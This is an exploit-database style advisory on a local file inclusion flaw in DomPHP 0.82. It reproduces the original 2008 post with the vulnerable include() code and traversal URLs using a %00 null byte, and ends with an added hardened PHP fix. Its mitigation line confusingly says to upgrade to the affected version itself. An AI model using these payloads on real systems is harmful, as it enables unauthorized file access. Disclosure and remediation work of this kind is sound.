Vendor: DomPHP
By: HouSSaMix From H-T Team
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: DomPHP
Affected Version From: 0.82
Affected Version To: 0.82
Patch Exists: YES
Related CWE: N/A
CPE: a:domphp:domphp:0.82
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DomPHP 0.82 Local File Inclusion

A local file inclusion vulnerability exists in DomPHP 0.82. The vulnerable code is located in the /aides/index.php file, which allows an attacker to include arbitrary files from the local system by sending a specially crafted HTTP request containing directory traversal characters. This can be exploited to gain access to sensitive information or execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of DomPHP 0.82 or apply the patch provided by the vendor.

Exploit-DB raw data:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team
                          
= Script : DomPHP 0.82              
= Download :  http://www.domphp.com/download/
             			        
= BUG : Local File Inclusion  
       
=  Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	// Strip http:// in case of a tampering attempt.
	$page = str_replace("http://","",$_GET['page']);
	include("../aides/".$page.".html");
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~	   

= Exploit :                                                  
http://Target/[path]/aides/index.php?page=[LFI]%00
      
= Get phpinfo =>  http://Target/[path]/info.php 
                http://Target/[path]/aides/index.php?page=../info.php%00
				
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

# milw0rm.com [2008-02-09]
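
A hardened form of the `page` handling in /aides/index.php, shown as an added example; it is not part of the original advisory and is not the vendor's patch. It assumes the help pages are static .html files stored directly in the aides/ directory, and the function name `resolve_help_page` is hypothetical.

```php
<?php
// Added example: replacement for the include() in /aides/index.php.
// Assumption: help pages are static *.html files directly inside aides/.

/**
 * Map a requested page name to a file inside $baseDir, or return null.
 * (Hypothetical helper, not a DomPHP function.)
 */
function resolve_help_page(string $requested, string $baseDir): ?string
{
    // 1. Accept a bare page name only. Dots, slashes, backslashes, NUL bytes
    //    and URL schemes all fail this check, so nothing needs "stripping".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Canonicalise, then confirm the result is still under the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.html');
    if ($base === false || $path === false) {
        return null;                      // missing directory or missing page
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                      // e.g. a symlink pointing outside aides/
    }
    return is_file($path) ? $path : null;
}

if (isset($_GET['page'])) {
    // Reject array-valued parameters (?page[]=x) before any string handling.
    $raw  = $_GET['page'];
    $file = is_string($raw) ? resolve_help_page($raw, __DIR__) : null;
    if ($file === null) {
        http_response_code(404);
        exit('Page not found');
    }
    // Send the HTML as data instead of include(), so it is never run as PHP.
    readfile($file);
}
```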